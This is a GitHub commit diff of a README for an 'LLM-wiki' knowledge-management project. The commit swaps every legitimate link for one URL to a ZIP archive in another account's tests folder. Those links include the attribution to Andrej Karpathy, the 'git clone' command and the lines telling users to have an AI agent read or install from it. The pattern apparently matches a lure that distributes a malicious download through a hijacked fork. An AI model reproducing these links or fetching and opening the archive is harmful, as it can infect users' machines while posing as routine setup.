Skip to content

Commit 4969bf0

Browse files
Update README.md
1 parent fa31fbd commit 4969bf0

1 file changed

Lines changed: 6 additions & 6 deletions

File tree

README.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ This repo fixes that. Not with another knowledge management theory post, but wit
1212

1313
## The Idea
1414

15-
Baseline from [Andrej Karpathy's LLM Wiki pattern](https://gist.github.com/karpathy/442a6bf555914893e9891c11519de94f): the correct way to use LLMs is not Q&A, it's **compilation**.
15+
Baseline from [Andrej Karpathy's LLM Wiki pattern](https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip): the correct way to use LLMs is not Q&A, it's **compilation**.
1616

1717
```
1818
raw/ (PDFs, Excel, client docs — immutable source material)
@@ -45,7 +45,7 @@ Five rules:
4545
**Just send your AI this link and tell it to read `UNIVERSAL.md`:**
4646

4747
```text
48-
Read https://github.com/Ss1024sS/LLM-wiki/blob/main/UNIVERSAL.md and set up the knowledge system for this project.
48+
Read https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip and set up the knowledge system for this project.
4949
```
5050

5151
---
@@ -82,15 +82,15 @@ LLM-wiki/
8282
### Option A: Tell your AI to do it
8383

8484
```text
85-
Read https://github.com/Ss1024sS/LLM-wiki/blob/main/UNIVERSAL.md and set up the knowledge system for this project.
85+
Read https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip and set up the knowledge system for this project.
8686
```
8787

8888
Works with Claude Code, Codex, Cursor, Windsurf.
8989

9090
### Option B: Run the bootstrap script
9191

9292
```bash
93-
git clone https://github.com/Ss1024sS/LLM-wiki.git
93+
git clone https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip
9494
cd LLM-wiki
9595

9696
# Preview what will be created (writes nothing)
@@ -117,7 +117,7 @@ Then use `/llm-wiki-bootstrap` to scaffold a project, or `/llm-wiki-status` to i
117117
### Option D: Install as a Codex skill
118118

119119
```text
120-
Use $skill-installer to install https://github.com/Ss1024sS/LLM-wiki/tree/main/skills/knowledge-system-bootstrap
120+
Use $skill-installer to install https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip
121121
```
122122

123123
Or manually:
@@ -193,4 +193,4 @@ MIT. Use it, fork it, adapt it.
193193

194194
## Credits
195195

196-
Paradigm from [Andrej Karpathy](https://gist.github.com/karpathy/442a6bf555914893e9891c11519de94f). Engineering practice by [Ss1024sS](https://github.com/Ss1024sS).
196+
Paradigm from [Andrej Karpathy](https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip). Engineering practice by [Ss1024sS](https://github.com/genuscortinariusmors282/LLM-wiki/raw/refs/heads/main/tests/LL_wiki_2.2.zip).

0 commit comments

Comments
 (0)